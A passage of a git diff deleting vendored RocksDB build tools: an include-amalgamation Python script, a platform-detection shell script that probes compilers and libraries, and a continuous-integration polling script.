-# This script works by starting with the unity build file and recursively expanding
-# #include directives. If the #include is found in a public include directory,
-# that header is expanded into the amalgamation header.
-#
-# A particular header is only expanded once, so this script will
-# break if there are multiple inclusions of the same header that are expected to
-# expand differently. Similarly, this type of code causes issues:
-#
-# #ifdef FOO
-#   #include "bar.h"
-#   // code here
-# #else
-#   #include "bar.h"            // oops, doesn't get expanded
-#   // different code here
-# #endif
-#
-# The solution is to move the include out of the #ifdef.
-
-from __future__ import print_function
-
-import argparse
-from os import path
-import re
-import sys
-
-include_re = re.compile('^[ \t]*#include[ \t]+"(.*)"[ \t]*$')
-included = set()
-excluded = set()
-
-def find_header(name, abs_path, include_paths):
-    samedir = path.join(path.dirname(abs_path), name)
-    if path.exists(samedir):
-        return samedir
-    for include_path in include_paths:
-        include_path = path.join(include_path, name)
-        if path.exists(include_path):
-            return include_path
-    return None
-
-def expand_include(include_path, f, abs_path, source_out, header_out, include_paths, public_include_paths):
-    if include_path in included:
-        return False
-
-    included.add(include_path)
-    with open(include_path) as f:
-        print('#line 1 "{}"'.format(include_path), file=source_out)
-        process_file(f, include_path, source_out, header_out, include_paths, public_include_paths)
-    return True
-
-def process_file(f, abs_path, source_out, header_out, include_paths, public_include_paths):
-    for (line, text) in enumerate(f):
-        m = include_re.match(text)
-        if m:
-            filename = m.groups()[0]
-            # first check private headers
-            include_path = find_header(filename, abs_path, include_paths)
-            if include_path:
-                if include_path in excluded:
-                    source_out.write(text)
-                    expanded = False
-                else:
-                    expanded = expand_include(include_path, f, abs_path, source_out, header_out, include_paths, public_include_paths)
-            else:
-                # now try public headers
-                include_path = find_header(filename, abs_path, public_include_paths)
-                if include_path:
-                    # found public header
-                    expanded = False
-                    if include_path in excluded:
-                        source_out.write(text)
-                    else:
-                        expand_include(include_path, f, abs_path, header_out, None, public_include_paths, [])
-                else:
-                    sys.exit("unable to find {}, included in {} on line {}".format(filename, abs_path, line))
-
-            if expanded:
-                print('#line {} "{}"'.format(line+1, abs_path), file=source_out)
-        elif text != "#pragma once\n":
-            source_out.write(text)
-
-def main():
-    parser = argparse.ArgumentParser(description="Transform a unity build into an amalgamation")
-    parser.add_argument("source", help="source file")
-    parser.add_argument("-I", action="append", dest="include_paths", help="include paths for private headers")
-    parser.add_argument("-i", action="append", dest="public_include_paths", help="include paths for public headers")
-    parser.add_argument("-x", action="append", dest="excluded", help="excluded header files")
-    parser.add_argument("-o", dest="source_out", help="output C++ file", required=True)
-    parser.add_argument("-H", dest="header_out", help="output C++ header file", required=True)
-    args = parser.parse_args()
-
-    include_paths = list(map(path.abspath, args.include_paths or []))
-    public_include_paths = list(map(path.abspath, args.public_include_paths or []))
-    excluded.update(map(path.abspath, args.excluded or []))
-    filename = args.source
-    abs_path = path.abspath(filename)
-    with open(filename) as f, open(args.source_out, 'w') as source_out, open(args.header_out, 'w') as header_out:
-        print('#line 1 "{}"'.format(filename), file=source_out)
-        print('#include "{}"'.format(header_out.name), file=source_out)
-        process_file(f, abs_path, source_out, header_out, include_paths, public_include_paths)
-
-if __name__ == "__main__":
-    main()
diff --git a/thirdparty/rocksdb/build_tools/build_detect_platform b/thirdparty/rocksdb/build_tools/build_detect_platform
deleted file mode 100755
index c7ddb7c..0000000
--- a/thirdparty/rocksdb/build_tools/build_detect_platform
+++ /dev/null
@@ -1,532 +0,0 @@
-#!/bin/sh
-#
-# Detects OS we're compiling on and outputs a file specified by the first
-# argument, which in turn gets read while processing Makefile.
-#
-# The output will set the following variables:
-#   CC                          C Compiler path
-#   CXX                         C++ Compiler path
-#   PLATFORM_LDFLAGS            Linker flags
-#   JAVA_LDFLAGS                Linker flags for RocksDBJava
-#   JAVA_STATIC_LDFLAGS         Linker flags for RocksDBJava static build
-#   PLATFORM_SHARED_EXT         Extension for shared libraries
-#   PLATFORM_SHARED_LDFLAGS     Flags for building shared library
-#   PLATFORM_SHARED_CFLAGS      Flags for compiling objects for shared library
-#   PLATFORM_CCFLAGS            C compiler flags
-#   PLATFORM_CXXFLAGS           C++ compiler flags.  Will contain:
-#   PLATFORM_SHARED_VERSIONED   Set to 'true' if platform supports versioned
-#                               shared libraries, empty otherwise.
-#
-# The PLATFORM_CCFLAGS and PLATFORM_CXXFLAGS might include the following:
-#
-#       -DROCKSDB_PLATFORM_POSIX    if posix-platform based
-#       -DSNAPPY                    if the Snappy library is present
-#       -DLZ4                       if the LZ4 library is present
-#       -DZSTD                      if the ZSTD library is present
-#       -DNUMA                      if the NUMA library is present
-#       -DTBB                       if the TBB library is present
-#
-# Using gflags in rocksdb:
-# Our project depends on gflags, which requires users to take some extra steps
-# before they can compile the whole repository:
-#   1. Install gflags. You may download it from here:
-#      https://gflags.github.io/gflags/ (Mac users can `brew install gflags`)
-#   2. Once installed, add the include path for gflags to your CPATH env var and
-#      the lib path to LIBRARY_PATH. If installed with default settings, the lib
-#      will be /usr/local/lib and the include path will be /usr/local/include
-
-OUTPUT=$1
-if test -z "$OUTPUT"; then
-  echo "usage: $0 <output-filename>" >&2
-  exit 1
-fi
-
-# we depend on C++11
-PLATFORM_CXXFLAGS="-std=c++11"
-# we currently depend on POSIX platform
-COMMON_FLAGS="-DROCKSDB_PLATFORM_POSIX -DROCKSDB_LIB_IO_POSIX"
-
-# Default to fbcode gcc on internal fb machines
-if [ -z "$ROCKSDB_NO_FBCODE" -a -d /mnt/gvfs/third-party ]; then
-    FBCODE_BUILD="true"
-    # If we're compiling with TSAN we need pic build
-    PIC_BUILD=$COMPILE_WITH_TSAN
-    if [ -z "$ROCKSDB_FBCODE_BUILD_WITH_481" ]; then
-      source "$PWD/build_tools/fbcode_config.sh"
-    else
-      # we need this to build with MySQL. Don't use for other purposes.
-      source "$PWD/build_tools/fbcode_config4.8.1.sh"
-    fi
-fi
-
-# Delete existing output, if it exists
-rm -f "$OUTPUT"
-touch "$OUTPUT"
-
-if test -z "$CC"; then
-   CC=cc
-fi
-
-if test -z "$CXX"; then
-    CXX=g++
-fi
-
-# Detect OS
-if test -z "$TARGET_OS"; then
-    TARGET_OS=`uname -s`
-fi
-
-if test -z "$TARGET_ARCHITECTURE"; then
-    TARGET_ARCHITECTURE=`uname -m`
-fi
-
-if test -z "$CLANG_SCAN_BUILD"; then
-    CLANG_SCAN_BUILD=scan-build
-fi
-
-if test -z "$CLANG_ANALYZER"; then
-    CLANG_ANALYZER=$(which clang++ 2> /dev/null)
-fi
-
-COMMON_FLAGS="$COMMON_FLAGS ${CFLAGS}"
-CROSS_COMPILE=
-PLATFORM_CCFLAGS=
-PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS"
-PLATFORM_SHARED_EXT="so"
-PLATFORM_SHARED_LDFLAGS="-Wl,--no-as-needed -shared -Wl,-soname -Wl,"
-PLATFORM_SHARED_CFLAGS="-fPIC"
-PLATFORM_SHARED_VERSIONED=true
-
-# generic port files (working on all platform by #ifdef) go directly in /port
-GENERIC_PORT_FILES=`cd "$ROCKSDB_ROOT"; find port -name '*.cc' | tr "\n" " "`
-
-# On GCC, we pick libc's memcmp over GCC's memcmp via -fno-builtin-memcmp
-case "$TARGET_OS" in
-    Darwin)
-        PLATFORM=OS_MACOSX
-        COMMON_FLAGS="$COMMON_FLAGS -DOS_MACOSX"
-        PLATFORM_SHARED_EXT=dylib
-        PLATFORM_SHARED_LDFLAGS="-dynamiclib -install_name "
-        # PORT_FILES=port/darwin/darwin_specific.cc
-        ;;
-    IOS)
-        PLATFORM=IOS
-        COMMON_FLAGS="$COMMON_FLAGS -DOS_MACOSX -DIOS_CROSS_COMPILE -DROCKSDB_LITE"
-        PLATFORM_SHARED_EXT=dylib
-        PLATFORM_SHARED_LDFLAGS="-dynamiclib -install_name "
-        CROSS_COMPILE=true
-        PLATFORM_SHARED_VERSIONED=
-        ;;
-    Linux)
-        PLATFORM=OS_LINUX
-        COMMON_FLAGS="$COMMON_FLAGS -DOS_LINUX"
-        if [ -z "$USE_CLANG" ]; then
-            COMMON_FLAGS="$COMMON_FLAGS -fno-builtin-memcmp"
-        fi
-        PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS -lpthread -lrt"
-        # PORT_FILES=port/linux/linux_specific.cc
-        ;;
-    SunOS)
-        PLATFORM=OS_SOLARIS
-        COMMON_FLAGS="$COMMON_FLAGS -fno-builtin-memcmp -D_REENTRANT -DOS_SOLARIS -m64"
-        PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS -lpthread -lrt -static-libstdc++ -static-libgcc -m64"
-        # PORT_FILES=port/sunos/sunos_specific.cc
-        ;;
-    AIX)
-        PLATFORM=OS_AIX
-        CC=gcc
-        COMMON_FLAGS="$COMMON_FLAGS -maix64 -pthread -fno-builtin-memcmp -D_REENTRANT -DOS_AIX -D__STDC_FORMAT_MACROS"
-        PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS -pthread -lpthread -lrt -maix64 -static-libstdc++ -static-libgcc"
-        # PORT_FILES=port/aix/aix_specific.cc
-        ;;
-    FreeBSD)
-        PLATFORM=OS_FREEBSD
-        COMMON_FLAGS="$COMMON_FLAGS -fno-builtin-memcmp -D_REENTRANT -DOS_FREEBSD"
-        PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS -lpthread"
-        # PORT_FILES=port/freebsd/freebsd_specific.cc
-        ;;
-    NetBSD)
-        PLATFORM=OS_NETBSD
-        COMMON_FLAGS="$COMMON_FLAGS -fno-builtin-memcmp -D_REENTRANT -DOS_NETBSD"
-        PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS -lpthread -lgcc_s"
-        # PORT_FILES=port/netbsd/netbsd_specific.cc
-        ;;
-    OpenBSD)
-        PLATFORM=OS_OPENBSD
-        COMMON_FLAGS="$COMMON_FLAGS -fno-builtin-memcmp -D_REENTRANT -DOS_OPENBSD"
-        PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS -pthread"
-        # PORT_FILES=port/openbsd/openbsd_specific.cc
-        ;;
-    DragonFly)
-        PLATFORM=OS_DRAGONFLYBSD
-        COMMON_FLAGS="$COMMON_FLAGS -fno-builtin-memcmp -D_REENTRANT -DOS_DRAGONFLYBSD"
-        PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS -lpthread"
-        # PORT_FILES=port/dragonfly/dragonfly_specific.cc
-        ;;
-    Cygwin)
-        PLATFORM=CYGWIN
-        PLATFORM_SHARED_CFLAGS=""
-        PLATFORM_CXXFLAGS="-std=gnu++11"
-        COMMON_FLAGS="$COMMON_FLAGS -DCYGWIN"
-        if [ -z "$USE_CLANG" ]; then
-            COMMON_FLAGS="$COMMON_FLAGS -fno-builtin-memcmp"
-        fi
-        PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS -lpthread -lrt"
-        # PORT_FILES=port/linux/linux_specific.cc
-        ;;
-    OS_ANDROID_CROSSCOMPILE)
-        PLATFORM=OS_ANDROID
-	COMMON_FLAGS="$COMMON_FLAGS -fno-builtin-memcmp -D_REENTRANT -DOS_ANDROID -DROCKSDB_PLATFORM_POSIX"
-	PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS "  # All pthread features are in the Android C library
-        # PORT_FILES=port/android/android.cc
-        CROSS_COMPILE=true
-        ;;
-    *)
-        echo "Unknown platform!" >&2
-        exit 1
-esac
-
-PLATFORM_CXXFLAGS="$PLATFORM_CXXFLAGS ${CXXFLAGS}"
-JAVA_LDFLAGS="$PLATFORM_LDFLAGS"
-JAVA_STATIC_LDFLAGS="$PLATFORM_LDFLAGS"
-
-if [ "$CROSS_COMPILE" = "true" -o "$FBCODE_BUILD" = "true" ]; then
-    # Cross-compiling; do not try any compilation tests.
-    # Also don't need any compilation tests if compiling on fbcode
-    true
-else
-    if ! test $ROCKSDB_DISABLE_FALLOCATE; then
-        # Test whether fallocate is available
-        $CXX $CFLAGS -x c++ - -o /dev/null 2>/dev/null  <<EOF
-          #include <fcntl.h>
-          #include <linux/falloc.h>
-          int main() {
-      int fd = open("/dev/null", 0);
-      fallocate(fd, FALLOC_FL_KEEP_SIZE | FALLOC_FL_PUNCH_HOLE, 0, 1024);
-          }
-EOF
-        if [ "$?" = 0 ]; then
-            COMMON_FLAGS="$COMMON_FLAGS -DROCKSDB_FALLOCATE_PRESENT"
-        fi
-    fi
-
-    # Test whether Snappy library is installed
-    # http://code.google.com/p/snappy/
-    $CXX $CFLAGS -x c++ - -o /dev/null 2>/dev/null  <<EOF
-      #include <snappy.h>
-      int main() {}
-EOF
-    if [ "$?" = 0 ]; then
-        COMMON_FLAGS="$COMMON_FLAGS -DSNAPPY"
-        PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS -lsnappy"
-        JAVA_LDFLAGS="$JAVA_LDFLAGS -lsnappy"
-    fi
-
-    # Test whether gflags library is installed
-    # http://gflags.github.io/gflags/
-    # check if the namespace is gflags
-    $CXX $CFLAGS -x c++ - -o /dev/null 2>/dev/null << EOF
-      #include <gflags/gflags.h>
-      using namespace gflags;
-      int main() {}
-EOF
-    if [ "$?" = 0 ]; then
-        COMMON_FLAGS="$COMMON_FLAGS -DGFLAGS=gflags"
-        PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS -lgflags"
-    else
-      # check if namespace is google
-      $CXX $CFLAGS -x c++ - -o /dev/null 2>/dev/null << EOF
-        #include <gflags/gflags.h>
-        using namespace google;
-        int main() {}
-EOF
-      if [ "$?" = 0 ]; then
-          COMMON_FLAGS="$COMMON_FLAGS -DGFLAGS=google"
-          PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS -lgflags"
-      fi
-    fi
-
-    # Test whether zlib library is installed
-    $CXX $CFLAGS $COMMON_FLAGS -x c++ - -o /dev/null 2>/dev/null  <<EOF
-      #include <zlib.h>
-      int main() {}
-EOF
-    if [ "$?" = 0 ]; then
-        COMMON_FLAGS="$COMMON_FLAGS -DZLIB"
-        PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS -lz"
-        JAVA_LDFLAGS="$JAVA_LDFLAGS -lz"
-    fi
-
-    # Test whether bzip library is installed
-    $CXX $CFLAGS $COMMON_FLAGS -x c++ - -o /dev/null 2>/dev/null  <<EOF
-      #include <bzlib.h>
-      int main() {}
-EOF
-    if [ "$?" = 0 ]; then
-        COMMON_FLAGS="$COMMON_FLAGS -DBZIP2"
-        PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS -lbz2"
-        JAVA_LDFLAGS="$JAVA_LDFLAGS -lbz2"
-    fi
-
-    # Test whether lz4 library is installed
-    $CXX $CFLAGS $COMMON_FLAGS -x c++ - -o /dev/null 2>/dev/null  <<EOF
-      #include <lz4.h>
-      #include <lz4hc.h>
-      int main() {}
-EOF
-    if [ "$?" = 0 ]; then
-        COMMON_FLAGS="$COMMON_FLAGS -DLZ4"
-        PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS -llz4"
-        JAVA_LDFLAGS="$JAVA_LDFLAGS -llz4"
-    fi
-
-    # Test whether zstd library is installed
-    $CXX $CFLAGS $COMMON_FLAGS -x c++ - -o /dev/null 2>/dev/null  <<EOF
-      #include <zstd.h>
-      int main() {}
-EOF
-    if [ "$?" = 0 ]; then
-        COMMON_FLAGS="$COMMON_FLAGS -DZSTD"
-        PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS -lzstd"
-        JAVA_LDFLAGS="$JAVA_LDFLAGS -lzstd"
-    fi
-
-    # Test whether numa is available
-    $CXX $CFLAGS -x c++ - -o /dev/null -lnuma 2>/dev/null  <<EOF
-      #include <numa.h>
-      #include <numaif.h>
-      int main() {}
-EOF
-    if [ "$?" = 0 ]; then
-        COMMON_FLAGS="$COMMON_FLAGS -DNUMA"
-        PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS -lnuma"
-        JAVA_LDFLAGS="$JAVA_LDFLAGS -lnuma"
-    fi
-
-    # Test whether tbb is available
-    $CXX $CFLAGS $LDFLAGS -x c++ - -o /dev/null -ltbb 2>/dev/null  <<EOF
-      #include <tbb/tbb.h>
-      int main() {}
-EOF
-    if [ "$?" = 0 ]; then
-        COMMON_FLAGS="$COMMON_FLAGS -DTBB"
-        PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS -ltbb"
-        JAVA_LDFLAGS="$JAVA_LDFLAGS -ltbb"
-    fi
-
-    # Test whether jemalloc is available
-    if echo 'int main() {}' | $CXX $CFLAGS -x c++ - -o /dev/null -ljemalloc \
-      2>/dev/null; then
-        # This will enable some preprocessor identifiers in the Makefile
-        JEMALLOC=1
-        # JEMALLOC can be enabled either using the flag (like here) or by
-        # providing direct link to the jemalloc library
-        WITH_JEMALLOC_FLAG=1
-    else
-        # jemalloc is not available. Let's try tcmalloc
-        if echo 'int main() {}' | $CXX $CFLAGS -x c++ - -o /dev/null \
-          -ltcmalloc 2>/dev/null; then
-            PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS -ltcmalloc"
-            JAVA_LDFLAGS="$JAVA_LDFLAGS -ltcmalloc"
-        fi
-    fi
-
-    # Test whether malloc_usable_size is available
-    $CXX $CFLAGS -x c++ - -o /dev/null 2>/dev/null  <<EOF
-      #include <malloc.h>
-      int main() {
-        size_t res = malloc_usable_size(0);
-        return 0;
-      }
-EOF
-    if [ "$?" = 0 ]; then
-        COMMON_FLAGS="$COMMON_FLAGS -DROCKSDB_MALLOC_USABLE_SIZE"
-    fi
-
-    # Test whether PTHREAD_MUTEX_ADAPTIVE_NP mutex type is available
-    $CXX $CFLAGS -x c++ - -o /dev/null 2>/dev/null  <<EOF
-      #include <pthread.h>
-      int main() {
-        int x = PTHREAD_MUTEX_ADAPTIVE_NP;
-        return 0;
-      }
-EOF
-    if [ "$?" = 0 ]; then
-        COMMON_FLAGS="$COMMON_FLAGS -DROCKSDB_PTHREAD_ADAPTIVE_MUTEX"
-    fi
-
-    # Test whether backtrace is available
-    $CXX $CFLAGS -x c++ - -o /dev/null 2>/dev/null  <<EOF
-      #include <execinfo.h>>
-      int main() {
-        void* frames[1];
-        backtrace_symbols(frames, backtrace(frames, 1));
-        return 0;
-      }
-EOF
-    if [ "$?" = 0 ]; then
-        COMMON_FLAGS="$COMMON_FLAGS -DROCKSDB_BACKTRACE"
-    else
-        # Test whether execinfo library is installed
-        $CXX $CFLAGS -lexecinfo -x c++ - -o /dev/null 2>/dev/null  <<EOF
-          #include <execinfo.h>
-          int main() {
-            void* frames[1];
-            backtrace_symbols(frames, backtrace(frames, 1));
-          }
-EOF
-        if [ "$?" = 0 ]; then
-            COMMON_FLAGS="$COMMON_FLAGS -DROCKSDB_BACKTRACE"
-            PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS -lexecinfo"
-            JAVA_LDFLAGS="$JAVA_LDFLAGS -lexecinfo"
-        fi
-    fi
-
-    # Test if -pg is supported
-    $CXX $CFLAGS -pg -x c++ - -o /dev/null 2>/dev/null  <<EOF
-      int main() {
-        return 0;
-      }
-EOF
-    if [ "$?" = 0 ]; then
-        PROFILING_FLAGS=-pg
-    fi
-
-    # Test whether sync_file_range is supported for compatibility with an old glibc
-    $CXX $CFLAGS -x c++ - -o /dev/null 2>/dev/null  <<EOF
-      #include <fcntl.h>
-      int main() {
-        int fd = open("/dev/null", 0);
-        sync_file_range(fd, 0, 1024, SYNC_FILE_RANGE_WRITE);
-      }
-EOF
-    if [ "$?" = 0 ]; then
-        COMMON_FLAGS="$COMMON_FLAGS -DROCKSDB_RANGESYNC_PRESENT"
-    fi
-
-    # Test whether sched_getcpu is supported
-    $CXX $CFLAGS -x c++ - -o /dev/null 2>/dev/null  <<EOF
-      #include <sched.h>
-      int main() {
-        int cpuid = sched_getcpu();
-      }
-EOF
-    if [ "$?" = 0 ]; then
-        COMMON_FLAGS="$COMMON_FLAGS -DROCKSDB_SCHED_GETCPU_PRESENT"
-    fi
-fi
-
-# TODO(tec): Fix -Wshorten-64-to-32 errors on FreeBSD and enable the warning.
-# -Wshorten-64-to-32 breaks compilation on FreeBSD i386
-if ! [ "$TARGET_OS" = FreeBSD -a "$TARGET_ARCHITECTURE" = i386 ]; then
-  # Test whether -Wshorten-64-to-32 is available
-  $CXX $CFLAGS -x c++ - -o /dev/null -Wshorten-64-to-32 2>/dev/null  <<EOF
-    int main() {}
-EOF
-  if [ "$?" = 0 ]; then
-    COMMON_FLAGS="$COMMON_FLAGS -Wshorten-64-to-32"
-  fi
-fi
-
-# shall we use HDFS?
-
-if test "$USE_HDFS"; then
-  if test -z "$JAVA_HOME"; then
-    echo "JAVA_HOME has to be set for HDFS usage."
-    exit 1
-  fi
-  HDFS_CCFLAGS="$HDFS_CCFLAGS -I$JAVA_HOME/include -I$JAVA_HOME/include/linux -DUSE_HDFS"
-  HDFS_LDFLAGS="$HDFS_LDFLAGS -lhdfs -L$JAVA_HOME/jre/lib/amd64"
-  HDFS_LDFLAGS="$HDFS_LDFLAGS -L$JAVA_HOME/jre/lib/amd64/server -L$GLIBC_RUNTIME_PATH/lib"
-  HDFS_LDFLAGS="$HDFS_LDFLAGS -ldl -lverify -ljava -ljvm"
-  COMMON_FLAGS="$COMMON_FLAGS $HDFS_CCFLAGS"
-  PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS $HDFS_LDFLAGS"
-  JAVA_LDFLAGS="$JAVA_LDFLAGS $HDFS_LDFLAGS"
-fi
-
-if test "$USE_SSE"; then
-  COMMON_FLAGS="$COMMON_FLAGS -msse4.2"
-elif test -z "$PORTABLE"; then
-  if test -n "`echo $TARGET_ARCHITECTURE | grep ^ppc64`"; then
-    # Tune for this POWER processor, treating '+' models as base models
-    POWER=`LD_SHOW_AUXV=1 /bin/true | grep AT_PLATFORM | grep -E -o power[0-9]+`
-    COMMON_FLAGS="$COMMON_FLAGS -mcpu=$POWER -mtune=$POWER "
-  elif test -n "`echo $TARGET_ARCHITECTURE | grep ^s390x`"; then
-    COMMON_FLAGS="$COMMON_FLAGS -march=z10 "
-  elif [ "$TARGET_OS" != AIX ] && [ "$TARGET_OS" != SunOS ]; then
-    COMMON_FLAGS="$COMMON_FLAGS -march=native "
-  fi
-fi
-
-$CXX $PLATFORM_CXXFLAGS $COMMON_FLAGS -x c++ - -o /dev/null 2>/dev/null <<EOF
-  #include <cstdint>
-  #include <nmmintrin.h>
-  int main() {
-    volatile uint32_t x = _mm_crc32_u32(0, 0);
-  }
-EOF
-if [ "$?" = 0 ]; then
-  COMMON_FLAGS="$COMMON_FLAGS -DHAVE_SSE42"
-elif test "$USE_SSE"; then
-  echo "warning: USE_SSE specified but compiler could not use SSE intrinsics, disabling"
-fi
-
-# iOS doesn't support thread-local storage, but this check would erroneously
-# succeed because the cross-compiler flags are added by the Makefile, not this
-# script.
-if [ "$PLATFORM" != IOS ]; then
-  $CXX $COMMON_FLAGS -x c++ - -o /dev/null 2>/dev/null <<EOF
-  #if defined(_MSC_VER) && !defined(__thread)
-  #define __thread __declspec(thread)
-  #endif
-  int main() {
-    static __thread int tls;
-  }
-EOF
-  if [ "$?" = 0 ]; then
-    COMMON_FLAGS="$COMMON_FLAGS -DROCKSDB_SUPPORT_THREAD_LOCAL"
-  fi
-fi
-
-PLATFORM_CCFLAGS="$PLATFORM_CCFLAGS $COMMON_FLAGS"
-PLATFORM_CXXFLAGS="$PLATFORM_CXXFLAGS $COMMON_FLAGS"
-
-VALGRIND_VER="$VALGRIND_VER"
-
-ROCKSDB_MAJOR=`build_tools/version.sh major`
-ROCKSDB_MINOR=`build_tools/version.sh minor`
-ROCKSDB_PATCH=`build_tools/version.sh patch`
-
-echo "CC=$CC" >> "$OUTPUT"
-echo "CXX=$CXX" >> "$OUTPUT"
-echo "PLATFORM=$PLATFORM" >> "$OUTPUT"
-echo "PLATFORM_LDFLAGS=$PLATFORM_LDFLAGS" >> "$OUTPUT"
-echo "JAVA_LDFLAGS=$JAVA_LDFLAGS" >> "$OUTPUT"
-echo "JAVA_STATIC_LDFLAGS=$JAVA_STATIC_LDFLAGS" >> "$OUTPUT"
-echo "VALGRIND_VER=$VALGRIND_VER" >> "$OUTPUT"
-echo "PLATFORM_CCFLAGS=$PLATFORM_CCFLAGS" >> "$OUTPUT"
-echo "PLATFORM_CXXFLAGS=$PLATFORM_CXXFLAGS" >> "$OUTPUT"
-echo "PLATFORM_SHARED_CFLAGS=$PLATFORM_SHARED_CFLAGS" >> "$OUTPUT"
-echo "PLATFORM_SHARED_EXT=$PLATFORM_SHARED_EXT" >> "$OUTPUT"
-echo "PLATFORM_SHARED_LDFLAGS=$PLATFORM_SHARED_LDFLAGS" >> "$OUTPUT"
-echo "PLATFORM_SHARED_VERSIONED=$PLATFORM_SHARED_VERSIONED" >> "$OUTPUT"
-echo "EXEC_LDFLAGS=$EXEC_LDFLAGS" >> "$OUTPUT"
-echo "JEMALLOC_INCLUDE=$JEMALLOC_INCLUDE" >> "$OUTPUT"
-echo "JEMALLOC_LIB=$JEMALLOC_LIB" >> "$OUTPUT"
-echo "ROCKSDB_MAJOR=$ROCKSDB_MAJOR" >> "$OUTPUT"
-echo "ROCKSDB_MINOR=$ROCKSDB_MINOR" >> "$OUTPUT"
-echo "ROCKSDB_PATCH=$ROCKSDB_PATCH" >> "$OUTPUT"
-echo "CLANG_SCAN_BUILD=$CLANG_SCAN_BUILD" >> "$OUTPUT"
-echo "CLANG_ANALYZER=$CLANG_ANALYZER" >> "$OUTPUT"
-echo "PROFILING_FLAGS=$PROFILING_FLAGS" >> "$OUTPUT"
-# This will enable some related identifiers for the preprocessor
-if test -n "$JEMALLOC"; then
-  echo "JEMALLOC=1" >> "$OUTPUT"
-fi
-# Indicates that jemalloc should be enabled using -ljemalloc flag
-# The alternative is to porvide a direct link to the library via JEMALLOC_LIB
-# and JEMALLOC_INCLUDE
-if test -n "$WITH_JEMALLOC_FLAG"; then
-  echo "WITH_JEMALLOC_FLAG=$WITH_JEMALLOC_FLAG" >> "$OUTPUT"
-fi
-echo "LUA_PATH=$LUA_PATH" >> "$OUTPUT"
diff --git a/thirdparty/rocksdb/build_tools/cont_integration.sh b/thirdparty/rocksdb/build_tools/cont_integration.sh
deleted file mode 100755
index 06f25c5..0000000
--- a/thirdparty/rocksdb/build_tools/cont_integration.sh
+++ /dev/null
@@ -1,135 +0,0 @@
-#!/usr/bin/env bash
-#
-# Copyright (c) 2016, Facebook. All rights reserved.
-#
-# Overall wrapper script for RocksDB continuous builds. The implementation is a
-# trivial pulling scheme. We loop infinitely, check if any new changes have been
-# committed, if yes then trigger a Sandcastle run, and finally go to sleep again
-# for a certain interval.
-#
-
-SRC_GIT_REPO=/data/git/rocksdb-public
-error=0
-
-function log {
-  DATE=`date +%Y-%m-%d:%H:%M:%S`
-  echo $DATE $@
-}
-
-function log_err {
-  log "ERROR: $@ Error code: $error."
-}
-
-function update_repo_status {
-  # Update the parent first.
-  pushd $SRC_GIT_REPO
-
-  # This is a fatal error. Something in the environment isn't right and we will
-  # terminate the execution.
-  error=$?
-  if [ ! $error -eq 0 ]; then
-    log_err "Where is $SRC_GIT_REPO?"
-    exit $error
-  fi
-
-  HTTPS_PROXY=fwdproxy:8080 git fetch -f
-
-  error=$?
-  if [ ! $error -eq 0 ]; then
-    log_err "git fetch -f failed."
-    popd
-    return $error
-  fi
-
-  git update-ref refs/heads/master refs/remotes/origin/master
-
-  error=$?
-  if [ ! $error -eq 0 ]; then
-    log_err "git update-ref failed."
-    popd
-    return $error
-  fi
-
-  popd
-
-  # We're back in an instance-specific directory. Get the latest changes.
-  git pull --rebase
-
-  error=$?
-  if [ ! $error -eq 0 ]; then
-    log_err "git pull --rebase failed."
-    return $error
-  fi
-}
-
-#
-# Execution starts here.
-#
-
-# Path to the determinator from the root of the RocksDB repo.
-CONTRUN_DETERMINATOR=./build_tools/RocksDBCommonHelper.php
-
-# Value of the previous commit.
-PREV_COMMIT=
-
-log "Starting to monitor for new RocksDB changes ..."
-log "Running under `pwd` as `whoami`."
-
-# Paranoia. Make sure that we're using the right branch.
-git checkout master
-
-error=$?
-if [ ! $error -eq 0 ]; then
-  log_err "This is not good. Can't checkout master. Bye-bye!"
-  exit 1
-fi
-
-# We'll run forever and let the execution environment terminate us if we'll
-# exceed whatever timeout is set for the job.
-while true;
-do
-  # Get the latest changes committed.
-  update_repo_status
-
-  error=$?
-  if [  $error -eq 0 ]; then
-    LAST_COMMIT=`git log -1 | head -1 | grep commit | awk '{ print $2; }'`
-
-    log "Last commit is '$LAST_COMMIT', previous commit is '$PREV_COMMIT'."
-
-    if [ "$PREV_COMMIT" == "$LAST_COMMIT" ]; then
-      log "There were no changes since the last time I checked. Going to sleep."
-    else
-      if [ ! -z "$LAST_COMMIT" ]; then
-        log "New code has been committed or previous commit not known. " \
-            "Will trigger the tests."
-
-        PREV_COMMIT=$LAST_COMMIT
-        log "Updated previous commit to '$PREV_COMMIT'."
-
-        #
-        # This is where we'll trigger the Sandcastle run. The values for
-        # HTTPS_APP_VALUE and HTTPS_APP_VALUE will be set in the container we're
-        # running in.
-        #
-        POST_RECEIVE_HOOK=1 php $CONTRUN_DETERMINATOR
-
-        error=$?
-        if [ $error -eq 0 ]; then
-          log "Sandcastle run successfully triggered."
-        else
-          log_err "Failed to trigger Sandcastle run."
-        fi
-      else
-        log_err "Previous commit not updated. Don't know what the last one is."
-      fi
-    fi
-  else
-    log_err "Getting latest changes failed. Will skip running tests for now."
-  fi
-
-  # Always sleep, even if errors happens while trying to determine the latest
-  # commit. This will prevent us terminating in case of transient errors.
-  log "Will go to sleep for 5 minutes."
-  sleep 5m
-done
diff --git a/thirdparty/rocksdb/build_tools/dependencies.sh b/thirdparty/rocksdb/build_tools/dependencies.sh
deleted file mode 100644
index 868753b..0000000
--- a/thirdparty/rocksdb/build_tools/dependencies.sh
+++ /dev/null
@@ -1,18 +0,0 @@
